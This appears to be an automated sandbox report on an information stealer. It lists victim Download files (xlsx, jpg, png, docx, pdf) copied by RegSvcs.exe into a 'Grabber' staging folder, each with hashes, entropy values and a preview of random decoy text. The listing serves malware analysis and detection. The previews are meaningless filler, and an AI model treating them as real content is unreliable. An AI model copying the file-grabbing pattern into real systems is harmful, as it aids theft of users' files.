XORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\AQRFEVRTGL.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691266297898928
Encrypted:	false
SSDEEP:	24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
MD5:	7D4E714F4EDA4631DCA8D420338392F1
SHA1:	536B4BCBAB5C780738EE2D562D16AB532C9D8E68
SHA-256:	841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
SHA-512:	FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
Malicious:	false
Preview:	AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\BQJUWOYRTO.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.68639364218091
Encrypted:	false
SSDEEP:	24:P4r5D4QctcBd3LMDzR8JwOlGpXSmDbvy5z5hu/KBdAmHtTQ:P49StmdbMfR8ApSmnvyXhuCBd3ts
MD5:	1D78D2A3ECD9D04123657778C8317C4E
SHA1:	3FAA27B9C738170AEE603EFAE9E455CA459EC1B7
SHA-256:	88D5FF8529480476CA72191A785B1CCDB8A5535594C125AF253823DD2DC0820E
SHA-512:	7EA58B30CB5FDA1C4D71DC65DF64FD9703E81DDCBAD9DA5B405CBBEACB9197A6E8B933C844289D7852801B6A5BC545C4234DD69E85F0AF640F5BC51BE5DDA12E
Malicious:	false
Preview:	BQJUWOYRTOLXZEKCXDLSWRNMFMCSYXRPFWPCFOMLTXRLOYSWDYNKGJBBEKHPTUBSJDZWIUKDQVTQQAEIJPJKOPTWULSKKXLSOLVYRREVXVSZLFQQBXKKCMYLLBRWPJMBHNBFTQUBUPFYXLIARNGQLIDNRZYVXHIWZXDZUYNJJXBTDFJWBKWCQQGPRFDTAZULKSSEFZTUDJOKODZLAIWAICBXNPXUMZFRUVBQDJIENEPBRWTDBODAVKDNOLRNYNBKKQBPGBUTIJCMZXSCKDRZIHJDDUPOXQOJQXAOMBHVIUUZBSRKPYCRBAHBBGKXGMODRWMTAMVEFAPKYMHWCUCKKJSLQYPIMPYZKZKPIXSZAPTLQLZGQHTXZBXONOWDVDWQMPDILYOIVFKXBUSTSFUGKZZBFUUTDDOMVPOINIMBFTSGRRDLSLPUXATPQGHCHIJRAGXNYBQOTZSNMAZCEDHOUMBJWJSCXGDMRQCIYNBQTBGKDTCTKRJCRXWGYTZRFYVOFBTBDYLRCDVRFBCHFMPWSBHHWRRLBRKCLDQRSMCLVZAGFMWLPHYJGALXNLZXJVWWXBFHYIZDZFXDBTHZKRDQBGOXOULNHYYUXXATXCLPLWIUBSSSLNJBTSMXAWVUVUVKDAOHXCIVGHJLVIETMJMFWUZTFVNALCFBKNUVWGXUEPDHVHGOBZRVOPDFCORECRQJIXMUFIACDLBMTHCLLXOISHLMFTEBKUAICYBSNGCASKNQBLIPLSIPNJTWJLGARSXDGLOKVQSUASJSIRFNLKQTPVOVXSGKMXEEUVWMULGSMRQRMICWPXBVELHRSUIIUSGMSRWNPMSLNFKZWDRGGAVGKNPMSZMHRWAKTDXUHZPMIYCRABYQLAAVOSTLMEJGFHJSMBRQBEICTCXKKZHNUWSZMQZHAMPRHAWDVATODUFFRHCHJYGQZNMBWVRFZTJLSUUUMCUEOZEUMCJAOLHOIJTNPLJBASLIHCUCMVTUNIOK

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\BUFZSQPCOH.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692335641801684
Encrypted:	false
SSDEEP:	24:zH8U6ceY5aV+Ai0xV38519ItLI1uSTaTtR4kYO9TsrMA7PTOGil5:QlUMHi0xVsrsLcn2hmYA7Pc
MD5:	DEF355B17D73C1495713C5488FCE7339
SHA1:	BECA340E4F9D7795A83636020FCF688DA88FA808
SHA-256:	471A7B08733F8B9E8AB162FE426B75361169906D3DD7564B28B19E4DBA14F328
SHA-512:	E95418C8C9F1A763D004E2572EF9D4379878FDD9D222E4605D7A77ED6D86CC764B68B358A7DFA8ED82749B24ED97FCC81139694A031E9B85032AF6CC1F973F67
Malicious:	false
Preview:	BUFZSQPCOHPBYKALHMHLNSRPRTVPDQBUOCQIUAODIUEKAFQGDJEJWAHUKUUNHNODDXVOYWZMQJTURWDHVUCIFBOWJXTDYGJYMUCANKQYYQDAZPDWHSRGGYVPVGUAROKTZQVZRKBJKUQPVSBXUNUVQUXGDDRCCFXNKCRLUTRGZCDJOZFSITBSODAQBZRACSSJHBZJQSWIDQKMDSFONWLGQGIXRSOSOSXFJYJOURMXKTHTKFPJKNLLIXAXMLRXRNSAITLJNMHURDCGMLBSZZGQUPFGUIAACPLZTRSOAQAAYBEWFKSLEZHQMZKSQNGWWBKCCEEXEFKGZNXXZCVVUCQBYNKOAKNKXZAUNQWYVAHGEZRKCYLJESNPTYNSPXUTDFYXGYZZIQICBFFNUPHHCIBKOGMJGNSDDHJIRRFZCCRFOZGNWZGCDMMSOGVDCESUEEHGPRLMKANOQICCTFXCLZEKAGRGLYLWFGMAGHPKQTDONAQKSFPNLTUUXPEUGETZPBEKMCJNCMHTBKTSCNRNVDHIDSZROKAYGDUISPBLTFVLFSAFKYVLQVJPAVOFSSUSZJNMUYOAKUULNRXBYNACAQEKDHCKCIVUYLXHDFNPCCZGNQLMWIUKMGKTRDESXVITCZNHDZOVZEBRZELODDFSSMCHTFHQMHCXBMKZDOFGFTOYNRJPSRASGBJNFZWJWPLWVHAVKBBVTNIPRUSXAFVYCMDUDJRJPWXFBWBCASKRZICWOFTNARKKQDFROZXDUUROLEJYXUQIETKBJKCQLMILRYABQHMQMPXTIBHFCVWURUXTHWCBAFLDWENGHOTDBECRYJDNCGXVYIOAMIANPSNYYMCPEBELRZLSAHCILCJUWSKZHDCDQPSCITMLNPHLHXANDSONCLLAEXJRKDMXZINBJKHEASISSKRWUYGFHFYXHMNYBHGOHNEUAJQYLOQBNHYGIGKJPTHMVWRDOPYXIXGSHDTONANJGYWXHUWUKASCHBKX

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\BXAJUJAOEO.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701111373123985
Encrypted:	false
SSDEEP:	24:wSplMoG/A1oXDoMwazZW6QAFWyGjkGKnEuDxOaV9YnF7U:walZG/A12L8MFYr8EuxTK9U
MD5:	CA5A3E2A0C2DDF92EABE165672425976
SHA1:	1933AC1A510945A766039E7E61D7DA4156E0F074
SHA-256:	4180C6A01C86C7D86A51B5C17957BAECF34EBB7FCB6C5968835A5DB64E3C9667
SHA-512:	64FC7B64CDAF57CF026C803A16036BDDC46CA86AC9C35A804FCE188AFA3056C324D62CCEBD45E7E607A53D11A1035CB6C38B24004D14F0DC17B11D8DFBD7DB6C
Malicious:	false
Preview:	BXAJUJAOEOZPYQVMPMMPXXMVCPSLTTLUOLYYQUQKLRMOQNFWEOCYDOLITPCVDLYSWYQACZEJIDILMNOOUVEVBOSWPXYLBOGFYWHZVFNHRJXYLODFWJLFJKMUXRMLQJAGMERGOWKSMBXUJUMRUBMROMDBISUWTFWPXBVVSTBYHRHUOKCJNGMCOLUFOVLKFFIUZHRPZUITDNNTTEJKTUSBPVEUSTDXHRMZNWZQSUEGRYELXBLVKZHEIVACMOHJWFJRPJKNIDOXZHIEUDGLSGKALGUCHSOBYGTVWDOVYUEMXJWYDCHTXKLWDJLIZFFBQOMRYKZVRXZYKIPKCJEYOVOQCGFXCUNQKHYBXFYRGYUQAUKMCSQKKDJIQWKZEWMJWHJDDENKZLPNJAJLVIEXHEGVFHRIOBAWGXOXLQJIISBHZZGJYZBYNUOKMCKTICSMRTMZVLKMZTCWKHOHWQBKEBGEASMMYEGDDSCGDTYEPANLCQSJIRCTCUHXIVGBREMBTULUXWAZISUYERUZPWQLRSPPVNCMSPDUHQTJKYNEEWYIFNUCJJSDFDNQJLWDBLURDBXKLJVMGWUBKEXPYFIJNWRSUNUJBZAWJQEZWEYFLNXWPKFJZFMVPYOJFFUYCTEUKFWSOFUOTKIGENNTAAXCAHPWQNKMKKGNWIOGZOBPOTDAQLZSIGMQTNQVGQJNNITTRMOHBPCHTGJANZTLZHNSTOQXJKIAZXWPQWIDJXZUURGYMTMZTWQNTRVEKAAWBRZQWZYVWKWEVAUTRSOXDHWSYIZYRJFVXSPNFOTDNAGHDFYSAEEFBXGQQGYMZHMQHZTDMNYXDQJKMLAXJWCBQUIKQFEPVZNRMOWEKGFDLUJLSXRKKJUIGCSCGZTXLHOWGMKDLSQHDWSPCYROUJEHKXBJSADOXSOMTTUGHDSOBTNUEDCBNWNIDSDBZKBGFCJHQNDVAAZTKEIMDCTKNOQUKPNHEQOBANQSCJQRQBRAIBBXRYTT

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\GLTYDMDUST.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69569301223482
Encrypted:	false
SSDEEP:	24:P1aJ3UFXnPRRqJn5Ao7J4kXjiut748cX3Gg6hQk:P1aWFX5RQnAuh48cHGg6hQk
MD5:	CA404BEA65D84F58838AF73B2DC67E02
SHA1:	56EDE3A3BF70705B1D42A2AE13F6605057C1E5F6
SHA-256:	4A28C898DF5967827C26FD633CD56275159EF4C4C0193E484E8E8F3E9ECC66B9
SHA-512:	10C144317CDB5A368733346EB8440A986A377916F98BE0E8232E668A8C5E107E06829ADF575751B94D0B0AA37F4CAC48DBD7BC64FFE8DCB140FB033C00CEC721
Malicious:	false
Preview:	GLTYDMDUSTFARDVTDTOSUXWTZPBTWYSDUWRWNQMOYZIOPMOCUVTIJOHJYLHKBCEDWQBIYLQPLFXNZVXOZBIBDNIIHCNZHRIZBCANIAZPBFFJNXGCWLILIHHCYJHZSFIZUUDHFLQEWBBOMWJOZCKSAOAVKAWDPLPLVPHHMTSMKFCHYLMZJYKTJZUGPCSSVJJOKBWSTSLHJSIZZNIHOVEXPMQSKABHGSGHFUWVNTWTGYCLXOQEPAIEYRMLWJNNZHEPKXAHFKJUQHDHBHMPKXFCHXQYMICUKIVHNMPIJURPFBDBUQWHFTUVKPWMJHVOENGHYYNPMJPLPTQKABBVHNTLFXAJUISPUCEXPQFWXNQKGLSPRPJEAIJQZNYNOWAKNLRQHQRIOFXWLXEJZPOKNRPRZQJIGYXOWWZDFNURUOTFOOSKCNYLZXJZIWHYYUTOQRDTTRMPEMHZSRVZISBDQKRQYXAZOKOCTHUJKZWNHJSEMHTCSKCARZUYORNVIXVWTGAWUONMQVDITNHLNLJNREIEBPKELOMXBMEUBFTSVSGBVXSXHICRIGHIFVXWPXMIKKKCBOFCJGKJYZJDAWFCHWCNIMOPOPYUXDESMSSFNZBKRVTKTFPFGCIMVLKPBRKBRZJRHIYUQFAFEODGJZAXKRAFGTBXKKKTOXYTJBCHZWBDPBSBRTICVTUOWNEXJIZFESQAIMINDZJFLHIQSMVIICPGSEVSLVSVPMBXUGAPVVXVNJEBHRRBRPIHKGVJJDRANYKMMFJJBFPKFDJAROFBZANTWLCLSELNCCDRQUPZIMXLCVFZOFWKZYXCLQVRUFHUTIFPNWERRWWXHSVZHEYMHULWKGIIWKBRWODYKIGEPXGOEZXMJVKVNTEOQXZBOZBXYKMUGZUYMELGGHJJVDPONTLTQGITEMXYMMOGRWMQDUHIGHPJWPGIEZDZPFZHQMQKLTBUGJXLBLEGTFQZOXBPYRZFHNMZGVZGRAKFYTWDWWKV

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\HMPPSXQPQV.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698711683401115
Encrypted:	false
SSDEEP:	24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
MD5:	47643CE7571E0C995094D7CE5F2005D7
SHA1:	40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
SHA-256:	1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
SHA-512:	3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
Malicious:	false
Preview:	HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\HMPPSXQPQV.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698711683401115
Encrypted:	false
SSDEEP:	24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
MD5:	47643CE7571E0C995094D7CE5F2005D7
SHA1:	40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
SHA-256:	1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
SHA-512:	3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
Malicious:	false
Preview:	HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\LFOPODGVOH.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698393795110914
Encrypted:	false
SSDEEP:	24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
MD5:	7C5655873C22D2522B13B34841F82038
SHA1:	ED733AE5B3E813B97D69E7283AEB8085EFC62B78
SHA-256:	9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
SHA-512:	A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
Malicious:	false
Preview:	LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJIFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\LFOPODGVOH.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698393795110914
Encrypted:	false
SSDEEP:	24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
MD5:	7C5655873C22D2522B13B34841F82038
SHA1:	ED733AE5B3E813B97D69E7283AEB8085EFC62B78
SHA-256:	9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
SHA-512:	A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
Malicious:	false
Preview:	LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJIFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\LHEPQPGEWF.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694579526837108
Encrypted:	false
SSDEEP:	24:9mugycA/B3wI1sZj9s/A0ikL8GO/M81cJzg+S+fBXOQklGKJx3:9mk53zsZj9s/okLklcJs+SOXlkEKJx3
MD5:	2DB1C5AA015E3F413D41884AC02B89BC
SHA1:	4872ADF2EA66D90FC5B417E4698CFF3E9A247E7B
SHA-256:	956C48539B32DB34EE3DAF968CC43EA462EE5622B66E3A7CB8705762EB0662F1
SHA-512:	C80222D65C3287D0A2FB5EB44A59737BC748C95ECDF14350A880CD653D3C39E7B47543AAE9C0CC541A16347E6E4217FB45DF4C96381D5BD820556186ED48B790
Malicious:	false
Preview:	LHEPQPGEWFOTTQHSFLPBDXLJVIUIXWOOHQVLZZIQOCFCCEMSPRTXAPYFKSXYXVFDPHPQVAQHOZTUKTMJPASSTGRXMYXGTLXIDQDVPWENFWHMFYQPBDWALBTHWFOOGFTAJOXJBCGAVMROZGTDWNNZZNJOIJGZLOORSLIGDTUKELZEAWCYJTOCEDKRQNUGUKGINWRVRIZBLNYZHTMFJHWMYODPGAYRQUTWYNKXDXGKZLBYJUDEGJGEGGHMFVTYCBCXJLBZAVKSUEGYRDAPRFIVDNDOIAEPTSNOQFOOYEDVSQTUFNNEYEEUIGJOAYENLWRFYHNPMJNOZNEWSOETCFVVGOQTOKWOVXYWOINEAHLDWXJOPISMHAIKZHVABPYANLCFQWIKUEGSZHGQKKWXTPUBFIXPWCKKSPWIPKGVNCWXTOLJGASSVRYTWKPOWKPNKRHTBSWQBFRVFTWBQEAGHCBTYUFFUUUEETCJIOPUPTHSBHQEPTFPMXQQDWNNIRISDVIUYUOMWIIEYUYGBMYTIPYRGIATEQQSHUXUTRPDXNWAGJAKJPNFAPNYOTRVPNRXEZYSZWDTXKAXFRFJSUHYWTTFWKBWWGQZXFZOXEFCXWVJDFWPMHLZGURBFMSNLFBZNHUAJHVNINGYNAEWHGWKJBYXTUXMFQKRFOCECDYREJUHNVDFGROXJCUQIMSSVRUGWEDDVIRDZYNYCRKTARFGNITFDORCBEIQVJPSIHLNFESPXNWWDSQILJLOVDKOQDNPUZXOJMYFJZKGNEFRLRATVHAMWMOUECPSNVCBIKZMPKBFTSOCSGKZGVKBNJJNGBHUKRERZCJYAICQVNEGQNFRLIKBCSEOCBSYDJBTCRZCCBTDDJNOETTYBUTBOBMQASYZUQJGKMPCMPBLFJALTHXFLNPFUSGVPUKMAQGHDSYASPYSACRNHOHKPBWPSTTZGQCXZWHSUOTIYNSQFNBEDMNZOZYYUDSPJXWXHROGZMTALITD

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Downloads\LIJDSFKJZG.jpg

Download File

